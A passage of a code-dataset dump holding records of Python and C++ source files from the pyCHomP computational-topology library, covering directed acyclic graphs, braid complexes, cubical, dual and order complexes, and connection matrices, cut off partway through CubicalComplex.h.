"text": "### CondensationGraph.py\n### MIT LICENSE 2016 Shaun Harker\n\nfrom pychomp.StronglyConnectedComponents import *\nfrom pychomp.DirectedAcyclicGraph import *\nfrom collections import defaultdict\n\ndef CondensationGraph(vertices, adjacencies):\n components = StronglyConnectedComponents(vertices, adjacencies)\n mapping = defaultdict(int, { u : i for i, component in enumerate(components) for u in component })\n scc_dag = DirectedAcyclicGraph()\n for i, component in enumerate(components):\n #print(\"Examining SCC \" + str(i))\n scc_dag.add_vertex(i)\n for u in component:\n #print(\"Examining adjacencies of vertex \" + str(u) + \" in SCC \" + str(i) )\n for v in adjacencies(u):\n #print(\"Adjacency \" + str(v) + \" belongs to SCC \" + str(mapping[v]) )\n if i != mapping[v]: scc_dag.add_edge(i,mapping[v])\n return scc_dag, mapping\n\n\n"
},
{
"alpha_fraction": 0.6772727370262146,
"alphanum_fraction": 0.689393937587738,
"avg_line_length": 22.571428298950195,
"blob_id": "77a727aca8bd5b8aab9d2243b47736f8624e54e9",
"content_id": "97bc847814fc173a51dbb4426b9492d1b4e384bf",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1320,
"license_type": "permissive",
"max_line_length": 73,
"num_lines": 56,
"path": "/src/pychomp/_chomp/include/ConnectionMatrix.h",
"repo_name": "shaunharker/pyCHomP",
"src_encoding": "UTF-8",
"text": "/// ConnectionMatrix.h\n/// Shaun Harker\n/// 2017-07-20\n/// MIT LICENSE\n\n#pragma once\n\n#include <memory>\n\n#include \"Integer.h\"\n#include \"Chain.h\"\n#include \"Complex.h\"\n#include \"MorseComplex.h\"\n#include \"MorseMatching.h\"\n#include \"GradedComplex.h\"\n#include \"MorseGradedComplex.h\"\n\n/// ConnectionMatrix\ninline\nstd::shared_ptr<GradedComplex> \nConnectionMatrix ( std::shared_ptr<GradedComplex> base ) {\n std::shared_ptr<GradedComplex> next = base;\n do {\n base = next;\n next = MorseGradedComplex(base);\n } while ( next -> complex() -> size() != base -> complex() -> size() );\n return base;\n}\n\n/// ConnectionMatrix\ninline\nstd::vector<std::shared_ptr<GradedComplex>>\nConnectionMatrixTower ( std::shared_ptr<GradedComplex> base ) {\n std::vector<std::shared_ptr<GradedComplex>> tower;\n std::shared_ptr<GradedComplex> next = base;\n std::shared_ptr<GradedComplex> last;\n do {\n tower.push_back(next);\n last = tower.back();\n next = MorseGradedComplex(last);\n } while ( next -> complex() -> size() != last -> complex() -> size() );\n return tower;\n}\n\n/// Python Bindings\n\n#include <pybind11/pybind11.h>\n#include <pybind11/stl.h>\nnamespace py = pybind11;\n\ninline\nvoid ConnectionMatrixBinding(py::module &m) {\n m.def(\"ConnectionMatrix\", &ConnectionMatrix);\n m.def(\"ConnectionMatrixTower\", &ConnectionMatrixTower);\n\n}\n"
},
{
"alpha_fraction": 0.5724269151687622,
"alphanum_fraction": 0.5902159810066223,
"avg_line_length": 25.25,
"blob_id": "185f6f385d0a622b9b5af22f59ef5ccafde38065",
"content_id": "c368febcaa5ffbb3a014bce123a390eee5555ad9",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1574,
"license_type": "permissive",
"max_line_length": 98,
"num_lines": 60,
"path": "/src/pychomp/_chomp/include/hash.hpp",
"repo_name": "shaunharker/pyCHomP",
"src_encoding": "UTF-8",
"text": "/// hash.hpp\n/// Shaun Harker\n/// 2018-02-02\n\n/// Add hash support\n\n#pragma once\n\n#include <utility>\n#include <set>\n\nnamespace pychomp {\n\n std::size_t hash_value ( std::size_t t );\n template <class A, class B> std::size_t hash_value(std::pair<A, B> const& v);\n template <class K, class C, class A> std::size_t hash_value ( std::set<K, C, A> const& p );\n template <typename T> void hash_combine (std::size_t & seed, const T& val);\n\n inline std::size_t\n hash_value ( std::size_t t ) {\n return std::hash<std::size_t>()(t);\n }\n\n template <class A, class B>\n std::size_t hash_value(std::pair<A, B> const& v) {\n std::size_t seed = 0;\n pychomp::hash_combine(seed, v.first);\n pychomp::hash_combine(seed, v.second);\n return seed;\n }\n\n template <class T>\n std::size_t\n hash_value ( std::vector<T> const& p ) {\n std::size_t seed = 0;\n for ( auto const& item : p ) pychomp::hash_combine( seed, item);\n return seed;\n }\n\n template <class K, class C, class A>\n std::size_t\n hash_value ( std::set<K, C, A> const& p ) {\n std::size_t seed = 0;\n for ( auto const& item : p ) pychomp::hash_combine( seed, item);\n return seed;\n }\n\n template <typename T>\n void hash_combine (std::size_t & seed, const T& val) {\n seed ^= hash_value(val) + 0x9e3779b9 // 7f4a7c16 // magic number hex digits of (\\sqrt{5}-1/2)\n + (seed<<6) + (seed>>2);\n }\n\n template <class T> \n struct hash : public std::unary_function<T const&, std::size_t> {\n std::size_t operator()(T const& val) const {\n return hash_value(val);\n }\n };\n}"
},
{
"alpha_fraction": 0.5240458846092224,
"alphanum_fraction": 0.5262707471847534,
"avg_line_length": 39.29655075073242,
"blob_id": "1e2b01143c6a1fe4727dfd12dd1bd253b885e47b",
"content_id": "8555645f60757f5eaa8f9068db8d25217437f280",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5843,
"license_type": "permissive",
"max_line_length": 120,
"num_lines": 145,
"path": "/src/pychomp/DirectedAcyclicGraph.py",
"repo_name": "shaunharker/pyCHomP",
"src_encoding": "UTF-8",
"text": "### DirectedAcyclicGraph.py\n### MIT LICENSE 2016 Shaun Harker\n\nimport subprocess, copy, json, graphviz, sys\nfrom collections import defaultdict\n\nfrom pychomp.TopologicalSort import *\n\n# TODO: don't silently fail if given a non-DAG\n\nclass DirectedAcyclicGraph:\n \"\"\"\n Represents a directed acyclic graph\n \"\"\"\n def __init__(self):\n \"\"\" Initialize an empty graph object \"\"\"\n self.vertices_ = set()\n self.adjacency_lists_ = {}\n self.vertex_labels_ = {}\n self.edge_labels_ = {}\n def add_vertex(self, v, label = ''):\n \"\"\" Add the vertex v to the graph and associate a label if one is given \"\"\"\n if v in self.vertices_: return\n self.vertices_.add(v)\n self.adjacency_lists_[v] = set ()\n self.vertex_labels_[v] = label\n self.edge_labels_[v] = {}\n def add_edge(self, u, v, label = ''):\n \"\"\" Add the edge u -> v to the graph and associate a label if one is given \"\"\"\n #print(\"Adding DAG edge (\" + str(u) + \", \" + str(v) + \")\")\n self.add_vertex(u)\n self.add_vertex(v)\n self.adjacency_lists_[u].add(v)\n self.edge_labels_[u][v] = label\n def remove_edge(self, u, v):\n \"\"\" Remove the edge u -> v from the graph \"\"\"\n self.adjacency_lists_[u].discard(v)\n self.edge_labels_[u].pop(v, None)\n def vertex_label(self, v):\n \"\"\" Return the label on the vertex v \"\"\"\n return self.vertex_labels_[v]\n def get_vertex_from_label(self, label):\n \"\"\" Return the vertex v with label 'label'. Error if non-unique. \"\"\"\n vertices = [ v for v in self.vertices_ if self.vertex_label(v) == label ]\n N = len(vertices)\n if N == 1:\n return vertices[0]\n elif N==0:\n return None\n elif N>1:\n raise ValueError(\"Non-unique vertex labels.\")\n def edge_label(self, u, v):\n \"\"\" Return the label on the edge u -> v \"\"\"\n return self.edge_labels_[u][v]\n def vertices(self):\n \"\"\" Return the set of vertices in the graph \"\"\"\n return self.vertices_\n def edges(self):\n \"\"\" Return a complete list of directed edges (u,v) in the graph \"\"\"\n return [(u,v) for u in self.vertices() for v in self.adjacencies(u)]\n def adjacencies(self, v):\n \"\"\" Return the set of adjacencies of v, i.e. { u : v -> u } \"\"\"\n return self.adjacency_lists_[v]\n def clone(self):\n \"\"\" Return a copy of this graph \"\"\"\n return copy.deepcopy(self)\n def transpose(self):\n \"\"\" Return a new graph with edge direction reversed. \"\"\"\n G = DirectedAcyclicGraph ()\n for v in self.vertices(): G.add_vertex(v,self.vertex_label(v))\n for (u,v) in self.edges(): G.add_edge(v,u,self.edge_label(u,v))\n return G\n def descendants(self, v):\n # Find vertices reachable from from v\n reachable = set([v])\n workstack = [v]\n while workstack:\n u = workstack.pop()\n for w in self.adjacencies(u):\n if w not in reachable:\n workstack.append(w)\n reachable.add(w)\n return reachable \n def transitive_closure(self):\n TS = TopologicalSort(self.vertices(), self.adjacencies)\n result = DirectedAcyclicGraph()\n for v in self.vertices():\n result.add_vertex(v) \n for v in self.vertices():\n # Find vertices reachable from from v\n reachable = set()\n reachable.add(v)\n for u in reversed(TS):\n if u in reachable:\n for w in self.adjacencies(u):\n reachable.add(w)\n for u in reachable:\n if u != v:\n result.add_edge(v, u)\n return result\n # \"\"\" Return a new graph which is the transitive closure \"\"\"\n # G = self.clone ()\n # #print(\"Transitive closure: n = \" + str(len(self.vertices())) )\n # for w in self.vertices():\n # for u in self.vertices():\n # for v in self.vertices():\n # if w in G.adjacencies(u) and v in G.adjacencies(w):\n # G . add_edge(u,v)\n # return G\n def transitive_reduction(self):\n \"\"\" Return a new graph which is the transitive reduction \"\"\"\n TS = TopologicalSort(self.vertices(), self.adjacencies)\n result = DirectedAcyclicGraph()\n for v in self.vertices():\n result.add_vertex(v) \n for v in self.vertices():\n # Find single-source longest paths from v\n lp = { u : -1 for u in self.vertices() }\n lp[v] = 0\n for u in reversed(TS):\n val = lp[u]\n if val >= 0:\n for w in self.adjacencies(u):\n if u != w:\n lp[w] = max(val + 1, lp[w])\n for u in [ w for w in lp if lp[w] == 1 ]:\n result.add_edge(v, u)\n return result\n\n # TC = self.transitive_closure ()\n # G = self.clone ()\n # for (u,v) in TC.edges():\n # for w in TC.adjacencies(v):\n # G.remove_edge(u,w)\n # return G\n def graphviz(self):\n \"\"\" Return a graphviz string describing the graph and its labels \"\"\"\n gv = 'digraph {\\n'\n indices = { v : str(k) for k,v in enumerate(self.vertices())}\n #for v in self.vertices(): gv += indices[v] + ';\\n' #+ '[label=\"' + self.vertex_label(v) + '\"];\\n'\n for v in self.vertices(): gv += indices[v] + '[label=\"' + self.vertex_label(v) + '\"];\\n'\n for (u,v) in self.edges(): gv += indices[u] + ' -> ' + indices[v] + ' [label=\"' + self.edge_label(u,v) + '\"];\\n'\n return gv + '}\\n'\n def _repr_svg_(self):\n return graphviz.Source(self.graphviz())._repr_svg_()\n"
},
{
"alpha_fraction": 0.5832333564758301,
"alphanum_fraction": 0.5964340567588806,
"avg_line_length": 35.917720794677734,
"blob_id": "133084437676122b864830178de1376bb283c02b",
"content_id": "0e3dfb96f0eb364e13041a4e24971f442f982ca0",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5833,
"license_type": "permissive",
"max_line_length": 149,
"num_lines": 158,
"path": "/src/pychomp/Braids.py",
"repo_name": "shaunharker/pyCHomP",
"src_encoding": "UTF-8",
"text": "### Braids.py\n### MIT LICENSE 2016 Shaun Harker\n\nfrom pychomp._chomp import *\n\nfrom collections import defaultdict\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nclass BraidDiagram:\n def __init__(self, braid_skeleton):\n \"\"\"\n Inputs:\n braid_skeleton : a list of lists such that \n braid_skeleton[i][j] gives the value of strand i at position j\n Outputs:\n braid_specification: a tuple (n, m, x, pi) \n where n : number of strands \n m : number of waypoints \n x(i,j) means the value of strand i at position j\n pi is a permutation such that x(i,j+m) == x(pi(i),j)\n \"\"\"\n self.n = len(braid_skeleton)\n self.m = len(braid_skeleton[0]) - 1\n self.permute_ = {}\n for i in range(0,self.n):\n for j in range(0,self.n):\n if braid_skeleton[i][self.m] == braid_skeleton[j][0]:\n self.permute_[i] = j\n self.braid_skeleton_ = braid_skeleton\n self.min_ = min([ min(braid_skeleton[i]) for i in range(0,len(braid_skeleton)) ])\n self.max_ = max([ max(braid_skeleton[i]) for i in range(0,len(braid_skeleton)) ])\n # convert\n self.thresholds = [ [float(\"-inf\")] + sorted( [self.braid_skeleton_[i][j] for i in range(0,self.n)] ) + [float(\"inf\")] for j in range(0,self.m) ]\n for j in range(0,self.m):\n self.thresholds[j][0] = self.thresholds[j][1] - 1.0\n self.thresholds[j][-1] = self.thresholds[j][-2] + 1.0\n\n\n def __call__(self, i, j):\n \"\"\"\n Return the height of strand i at position j\n \"\"\"\n return self.braid_skeleton_[i][j]\n\n def pi(self,i):\n \"\"\"\n pi is a permutation such that x(i,j+m) == x(pi(i),j)\n \"\"\"\n return self.permute_[i]\n\n def lap(self, coordinates):\n \"\"\"\n Compute the lap number for a domain (given by a point in it)\n \"\"\"\n #midpoints = [ sum(domain.bounds()[j]) / 2.0 for j in (list(range(0,self.m)) + [0]) ] \n \n # on right fringe, give a big lap number\n if any( coord == self.n + 1 for coord in coordinates ):\n return 2 * self.n * self.m\n\n # otherwise, do the legitimate computation:\n midpoints = [ (self.thresholds[j][i+1] + self.thresholds[j][i])/2.0 for j,i in list(enumerate(coordinates)) + [(0,coordinates[0])]]\n return sum(self(i,j) <= midpoints[j] and self(i,j+1) >= midpoints[j+1] for j in range(0,self.m) for i in range(0,self.n))\n\n def draw(self, domain=None):\n x = np.arange(self.m+1)\n for i in range(0,self.n):\n plt.plot(x, [self(i,j) for j in range(0,self.m+1)])\n if domain:\n def f(x):\n if x[0] == -float(\"inf\") and x[1] == -float(\"inf\"):\n return self.min_ - 1.0\n if x[0] == float(\"inf\") and x[1] == float(\"inf\"):\n return self.max_ + 1.0\n if x[0] == -float(\"inf\"):\n return x[1] - .5\n if x[1] == float(\"inf\"):\n return x[0] + .5\n return (x[0] + x[1]) / 2.0\n strand = [ f(domain.bounds()[d]) for d in range(0, self.m) ]\n strand = strand + [strand[0]]\n plt.plot(x, strand, '--', color='b',)\n plt.show()\n\n def __repr__(self):\n self.draw()\n return \"Braid Diagram\"\n\ndef BraidComplex( braid_diagram ):\n \"\"\"\n Overview:\n Given a specification for a \"braids\" dynamical system,\n return the associated cubical complex and flow graph.\n \"\"\"\n\n # Unpack the input\n n = braid_diagram.n\n m = braid_diagram.m\n x = lambda i,j : braid_diagram(i,j)\n pi = lambda i : braid_diagram.pi(i)\n\n # Create the associated cubical complex\n\n thresholds = [ [float(\"-inf\")] + sorted( [x(i,j) for i in range(0,n)] ) + [float(\"inf\")] for j in range(0,m) ]\n # complex = CubicalComplex(CubicalGrid(thresholds))\n complex = CubicalComplex([ len(thresholds[j]) for j in range(0,m)])\n \n #lap = lambda x : braid_diagram.lap(complex.coordinates(x))\n\n lap_dict = {}\n def lap(x):\n if x not in lap_dict:\n lap_dict[x] = braid_diagram.lap(complex.coordinates(x))\n return lap_dict[x]\n\n # for x in complex(complex.dimension()):\n # print( str(x) + \" has coordinates \" + str(complex.coordinates(x)) + \" and lap number \" + str(lap(x)))\n\n # Construct the domains\n # domains = [cell for cell in complex.cells() if cell.dimension() == m]\n # walls = [cell for cell in complex.cells() if cell.dimension() == m-1]\n\n domains = [cell for cell in complex(m)]\n walls = [cell for cell in complex(m-1)]\n\n # Construct the edge set\n edges = defaultdict(set)\n for wall in walls:\n # A wall can have 1 adjacent domain if it is off at infinity\n if len(complex.coboundary({wall})) == 1: continue\n # Otherwise, it has precisely 2 adjacent domains\n [u, v] = complex.coboundary({wall})\n if lap(u) <= lap(v):\n edges[v].add(u)\n if lap(u) >= lap(v):\n edges[u].add(v)\n\n # Identify collapsed strands\n collapsed_strands = [ i for i in range(0,n) if pi(i) == i ]\n\n #collapsed_vertices = [ CubicalCell([ [ x(i,j), x(i,j) ] for j in range(0,m) ]) for i in collapsed_strands ]\n collapsed_vertices_coords = [ [ braid_diagram.thresholds[j].index(braid_diagram(i,j)) for j in range(0,m) ] for i in collapsed_strands]\n collapsed_vertices = [ complex.cell_index(coordinates, 0) for coordinates in collapsed_vertices_coords ]\n\n # Connect all cubes in the star of any collapsed strand\n for v in collapsed_vertices:\n #print(\"collapsed vertex \" + str(v) + \" has coordinates \" + str(complex.coordinates(v)) + \" and shape \" + str(complex.cell_shape(v)))\n #surrounding_walls = [ cell for cell in star(v) if cell.dimension() == m-1 ]\n surrounding_walls = [ cell for cell in complex.star({v}) if cell >= walls[0] and cell <= walls[-1] ]\n\n for wall in surrounding_walls:\n if len(complex.coboundary({wall})) == 1: continue\n [u, v] = complex.coboundary({wall})\n edges[u].add(v)\n edges[v].add(u)\n\n return (complex, lambda v : edges[v] )\n"
},
{
"alpha_fraction": 0.6530736684799194,
"alphanum_fraction": 0.662203311920166,
"avg_line_length": 30.596153259277344,
"blob_id": "c9f450eff485fe10ea717a9eff033dfd0acb239e",
"content_id": "c68348bb697ecf001db2d6a162528ea30a3f89e0",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1643,
"license_type": "permissive",
"max_line_length": 87,
"num_lines": 52,
"path": "/src/pychomp/_chomp/include/Iterator.h",
"repo_name": "shaunharker/pyCHomP",
"src_encoding": "UTF-8",
"text": "/// Iterator.h\n/// Shaun Harker\n/// 2018-03-10\n/// MIT LICENSE\n\n#pragma once\n\n#include \"common.h\"\n\n#include \"Integer.h\"\n\ntemplate < typename I >\nclass IteratorRange {\npublic:\n typedef I iterator;\n typedef I const_iterator;\n IteratorRange ( void ) {}\n IteratorRange ( iterator b, iterator e ) : begin_(b), end_(e) {}\n iterator begin ( void ) const { return begin_;}\n iterator end ( void ) const { return end_;}\n uint64_t size ( void ) const { return end_ - begin_;}\n typename iterator::value_type operator [] ( int64_t i ) const {return *(begin_ + i);}\nprivate:\n iterator begin_;\n iterator end_;\n};\n\nclass CountingIterator {\npublic:\n typedef CountingIterator self_type;\n typedef Integer value_type;\n typedef Integer& reference;\n typedef Integer* pointer;\n typedef Integer difference_type;\n typedef std::forward_iterator_tag iterator_category;\n CountingIterator(void) : val_(0) {}\n CountingIterator(Integer i) : val_(i) { }\n self_type operator++() { return ++ val_; }\n self_type operator++(int) { return val_ ++; }\n self_type operator+(Integer i) const {return CountingIterator(val_ + i);}\n difference_type operator-(self_type const& rhs) const{return val_ - rhs.val_;}\n Integer operator*() const { return val_; }\n //const T* operator->() { return ptr_; }\n self_type operator=(const self_type& other) { val_ = other.val_; return *this; }\n bool operator==(const self_type& rhs)const { return val_ == rhs.val_; }\n bool operator!=(const self_type& rhs)const { return val_ != rhs.val_; }\nprivate:\n int64_t val_;\n};\n\ntypedef CountingIterator Iterator;\ntypedef IteratorRange<Iterator> Range;\n"
},
{
"alpha_fraction": 0.5791106224060059,
"alphanum_fraction": 0.5966907739639282,
"avg_line_length": 20.488889694213867,
"blob_id": "d6c7ddf37f4e3597cfe3db954f93b365706f268b",
"content_id": "8010e43b6985606b1a8371aaa0609ac35f15f553",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 967,
"license_type": "permissive",
"max_line_length": 77,
"num_lines": 45,
"path": "/src/pychomp/_chomp/include/OrderComplex.h",
"repo_name": "shaunharker/pyCHomP",
"src_encoding": "UTF-8",
"text": "/// OrderComplex.h\n/// Shaun Harker\n/// MIT LICENSE\n/// 2018-03-12\n\n#pragma once\n\n#include \"common.h\"\n#include \"SimplicialComplex.h\"\n\nstd::shared_ptr<SimplicialComplex>\nOrderComplex ( std::shared_ptr<Complex> c ) {\n std::vector<Simplex> simplices;\n std::stack<Simplex> work_stack;\n for ( auto i : *c ) {\n work_stack.push({i});\n while ( not work_stack.empty() ) {\n Simplex s = work_stack.top();\n work_stack.pop();\n auto v = s.back();\n auto bd = c -> boundary({v});\n for ( auto u : bd ) {\n Simplex t = s;\n t.push_back(u);\n work_stack.push(t);\n }\n if ( bd.size() == 0 ) {\n simplices.push_back(s);\n }\n }\n }\n std::shared_ptr<SimplicialComplex> oc ( new SimplicialComplex(simplices) );\n return oc;\n}\n\n/// Python Bindings\n\n#include <pybind11/pybind11.h>\n#include <pybind11/stl.h>\nnamespace py = pybind11;\n\ninline void\nOrderComplexBinding(py::module &m) {\n m.def(\"OrderComplex\", &OrderComplex);\n}\n"
},
{
"alpha_fraction": 0.5856079459190369,
"alphanum_fraction": 0.6011165976524353,
"avg_line_length": 23.059701919555664,
"blob_id": "e1550268ab707df7b799ea2f2aa8ee7118fbe481",
"content_id": "9e16c740fa2ccf988ac7edd527bdd2d461e5d2b8",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1612,
"license_type": "permissive",
"max_line_length": 82,
"num_lines": 67,
"path": "/src/pychomp/_chomp/include/DualComplex.h",
"repo_name": "shaunharker/pyCHomP",
"src_encoding": "UTF-8",
"text": "/// DualComplex.h\n/// Shaun Harker\n/// 2018-03-12\n/// MIT LICENSE\n\n#pragma once\n\n#include \"common.h\"\n\n#include \"Complex.h\"\n\n/// DualComplex\nclass DualComplex : public Complex {\npublic:\n\n DualComplex( std::shared_ptr<Complex> c ) : c_(c) {\n dim_ = c_ -> dimension();\n begin_.resize(dim_+2);\n Integer cumulative = 0;\n for ( Integer d = 0; d <= dim_; ++ d ) {\n begin_[d] = Iterator(cumulative);\n cumulative += c_ -> size(dim_ - d);\n }\n begin_[dim_ + 1] = c_ -> size();\n }\n\n /// dual\n /// Give the dual index of a cell\n Integer \n dual ( Integer x ) const {\n return size() - x - 1;\n }\n\n /// column\n /// Apply \"callback\" method to every element in ith column of\n /// boundary matrix\n virtual void\n column ( Integer i, std::function<void(Integer)> const& callback) const final {\n auto transformed = [&](Integer x){ callback(size() - x - 1); };\n c_ -> row(size() - i - 1, transformed );\n }\n\n /// row\n /// Apply \"callback\" method to every element in ith row of\n /// boundary matrix\n virtual void\n row ( Integer i, std::function<void(Integer)> const& callback) const final {\n auto transformed = [&](Integer x){ callback(size() - x - 1); };\n c_ -> column(size() - i - 1, transformed );\n }\n\nprotected:\n std::shared_ptr<Complex> c_;\n};\n\n/// Python Bindings\n\n#include <pybind11/pybind11.h>\n#include <pybind11/stl.h>\nnamespace py = pybind11;\n\ninline void\nDualComplexBinding(py::module &m) {\n py::class_<DualComplex, std::shared_ptr<DualComplex>, Complex>(m, \"DualComplex\")\n .def(py::init<std::shared_ptr<Complex>>())\n .def(\"dual\",&DualComplex::dual);\n}\n"
},
{
"alpha_fraction": 0.7263279557228088,
"alphanum_fraction": 0.7355658411979675,
"avg_line_length": 29.928571701049805,
"blob_id": "6567471fe98be6415d74fcdc9097a25a5ef614b0",
"content_id": "ee9ebdc6ecc59f6e5adb09b5b3ade92d2b57bee2",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 866,
"license_type": "permissive",
"max_line_length": 102,
"num_lines": 28,
"path": "/src/pychomp/_chomp/include/MorseMatching.hpp",
"repo_name": "shaunharker/pyCHomP",
"src_encoding": "UTF-8",
"text": "/// MorseMatching.hpp\n/// Shaun Harker\n/// 2018-02-23\n/// MIT LICENSE\n\n#include \"MorseMatching.h\"\n#include \"CubicalMorseMatching.h\"\n#include \"GenericMorseMatching.h\"\n\ninline\nstd::shared_ptr<MorseMatching>\nMorseMatching::compute_matching ( std::shared_ptr<Complex> complex ) {\n if ( std::dynamic_pointer_cast<CubicalComplex>(complex) ) {\n return std::make_shared<CubicalMorseMatching>(std::dynamic_pointer_cast<CubicalComplex>(complex));\n } else {\n return std::make_shared<GenericMorseMatching>(complex);\n }\n}\n\ninline\nstd::shared_ptr<MorseMatching>\nMorseMatching::compute_matching ( std::shared_ptr<GradedComplex> graded_complex ) {\n if ( std::dynamic_pointer_cast<CubicalComplex>(graded_complex->complex()) ) {\n return std::make_shared<CubicalMorseMatching>(graded_complex);\n } else {\n return std::make_shared<GenericMorseMatching>(graded_complex);\n }\n}\n"
},
{
"alpha_fraction": 0.5673112869262695,
"alphanum_fraction": 0.5793042778968811,
"avg_line_length": 31.702259063720703,
"blob_id": "fce23bedf1455b7734d0046cf1fd5a1e91b99dbb",
"content_id": "0bec1161a095f0e394f58ca9e56ac0877a927385",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 15926,
"license_type": "permissive",
"max_line_length": 109,
"num_lines": 487,
"path": "/src/pychomp/_chomp/include/CubicalComplex.h",
"repo_name": "shaunharker/pyCHomP",
"src_encoding": "UTF-8",
"text": "/// CubicalComplex.h\n/// Shaun Harker 2016-12-15-2159\n/// MIT LICENSE\n\n#pragma once\n\n#include \"common.h\"\n\n#include \"Integer.h\"\n#include \"Iterator.h\"\n#include \"Chain.h\"\n#include \"Complex.h\"\n\n// TODO:\n// get rid of interfaces like boxes()[d] in favor of boxes(d)\n\n/// CubicalComplex\n/// Implements a trivial cubical complex with Z_2 coefficients\n/// Methods:\n/// ImageComplex : Initialize the complex with width N and height M\n/// boundary : given a cell, returns an array of boundary cells\n/// coboundary : given a cell, returns an array of coboundary cells\n/// cells : return the set of cells in complex\nclass CubicalComplex : public Complex {\npublic:\n /// CubicalComplex\n /// Default constructor\n CubicalComplex ( void ) {}\n\n /// CubicalComplex\n /// Initialize the complex that is boxes[i] boxes across \n /// in dimensions d = 0, 1, ..., boxes.size() - 1\n /// Note: The cubical complex does not have cells on the \n /// far right, so to have a \"full\" cubical \n /// complex as a subcomplex, pad with an extra box.\n CubicalComplex ( std::vector<Integer> const& boxes ) {\n assign ( boxes );\n }\n\n /// assign\n /// Initialize the complex that is boxes[i] boxes across \n /// in dimensions d = 0, 1, ..., boxes.size() - 1\n void\n assign ( std::vector<Integer> const& boxes ) {\n // Get dimension\n Integer D = boxes.size();\n\n // Compute PV := [1, boxes[0], boxes[0]*boxes[1], ..., boxes[0]*boxes[1]*...*boxes[D-1]]\n auto & PV = place_values_;\n PV.resize ( D+1 );\n PV[0] = 1;\n std::partial_sum (boxes.begin(), boxes.end(), PV.begin() + 1, std::multiplies<Integer>()); \n\n Integer M = 1L << D; // number of types\n Integer L = PV[D]; // Number of cells per shape/type\n Integer N = L * M; // cells per type * number of types\n\n // Set data\n boxes_ = boxes;\n dim_ = D;\n num_types_ = M;\n type_size_ = L;\n\n // Generate shapes and then sort them by dimension (which is bit popcount) to create types.\n // for d = 4: (0D) 0, (1D) 1, 2, 4, 8, (2D) 3, 5, 6, 9, 10, 12, (3D) 7, 11, 13, 14, (4D) 15 (shapes)\n // 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 (types)\n // Implement a bijection between shapes and types via the following arrays:\n auto & ST = shape_from_type_;\n auto & TS = type_from_shape_;\n\n ST.resize ( M );\n TS.resize ( M );\n std::iota(ST.begin(), ST.end(), 0 );\n auto compare = [&](Integer x, Integer y) { return popcount_(x) < popcount_(y); };\n std::stable_sort(ST.begin(), ST.end(), compare);\n for ( Integer type = 0; type < M; ++ type) TS[ST[type]] = type; \n\n // Set up iterator bounds for every dimension\n begin_ . resize ( dimension() + 2, N );\n for ( Integer type = 0, idx = 0; type < M; ++ type, idx += L ) {\n Integer shape = ST[type];\n Integer dim = popcount_(shape);\n begin_[dim] = Iterator(std::min(*begin_[dim], idx));\n }\n\n // Set up topstar_offset_ data structure\n topstar_offset_.resize(M);\n for ( Integer i = 0; i < M; ++ i ) {\n topstar_offset_[i] = 0;\n for ( Integer d = 0; d < dimension(); ++ d ) {\n if ( (i & (1L << d)) == 0 ) { \n topstar_offset_[i] -= place_values_[d];\n }\n }\n }\n }\n\n /// column\n virtual void\n column ( Integer cell, std::function<void(Integer)> const& callback ) const final {\n Integer shape = cell_shape(cell);\n Integer position = cell % type_size();\n for ( Integer d = 0, bit = 1; d < dimension(); ++ d, bit <<= 1L ) {\n // If cell has no extent in this dimension, no boundaries.\n if ( not (shape & bit) ) continue;\n Integer type_offset = type_size() * ( TS() [ shape ^ bit ] );\n callback( position + type_offset );\n // Otherwise, the cell does have extent in this dimension.\n // It is always the case that such a cell has a boundary to the left.\n Integer right_position = position + PV()[d];\n if (right_position >= type_size()) right_position -= type_size();\n callback( right_position + type_offset );\n }\n }\n\n /// row\n virtual void\n row ( Integer cell, std::function<void(Integer)> const& callback ) const final {\n Integer shape = cell_shape(cell);\n Integer position = cell % type_size();\n for ( Integer d = 0, bit = 1; d < dimension(); ++ d, bit <<= 1L ) {\n // If cell has extent in this dimension, no coboundaries.\n if ( shape & bit ) continue;\n Integer type_offset = type_size() * ( TS() [ shape ^ bit ] );\n callback( position + type_offset );\n Integer left_position = position - PV()[d];\n if (left_position < 0) left_position += type_size();\n callback( left_position + type_offset );\n }\n }\n\n /// topstar\n /// return top dimensional cells in star\n /// note: assumed twisted periodic conditions\n virtual std::vector<Integer>\n topstar ( Integer cell ) const {\n std::vector<Integer> result;\n Integer shape = cell_shape(cell);\n // Loop through dimension()-bit bitcodes\n Integer M = 1L << dimension(); // i.e. 2^dimension()\n // Compute the topcell x we get by expanding cell to the right in all collapsed dimensions:\n Integer position = cell % type_size(); // (M-1)==(2^D-1) is type of a topcell\n Integer offset = type_size() * (M-1);\n // std::cout << \" cell = \" << cell << \"\\n\";\n // std::cout << \"all-1's topcell = \" << x << \"\\n\";\n for ( Integer i = 0; i < M; ++ i ) {\n if ( (shape & ~i ) == 0 ) { // if shape bit is one, then index i bit must be on.\n // i is a valid offset\n // std::cout << \" shape = \" << shape << \" i == \" << i << \"\\n\";\n // std::cout << \" i = \" << i << \"\\n\";\n // std::cout << \" topstar_offset_[i] = \" << topstar_offset_[i] << \"\\n\";\n result.push_back(offset + (position + topstar_offset_[i] + type_size() ) % type_size());\n } else {\n // TODO skip many invalid indices simultaneously\n }\n }\n return result;\n }\n\n /// parallelneighbors\n /// return top dimensional cells in star\n /// note: assumed twisted periodic conditions\n std::vector<Integer>\n parallelneighbors ( Integer cell ) const {\n Integer shape = cell_shape(cell);\n Integer position = cell % type_size();\n Integer type_offset = type_size() * TS() [ shape ];\n std::vector<Integer> result;\n auto record = [&](Integer offset) {\n Integer k = position + offset;\n if ( k >= type_size()) k -= type_size(); else if ( k < 0 ) k += type_size();\n result.push_back(k + type_offset);\n };\n auto D = dimension();\n std::vector<int> 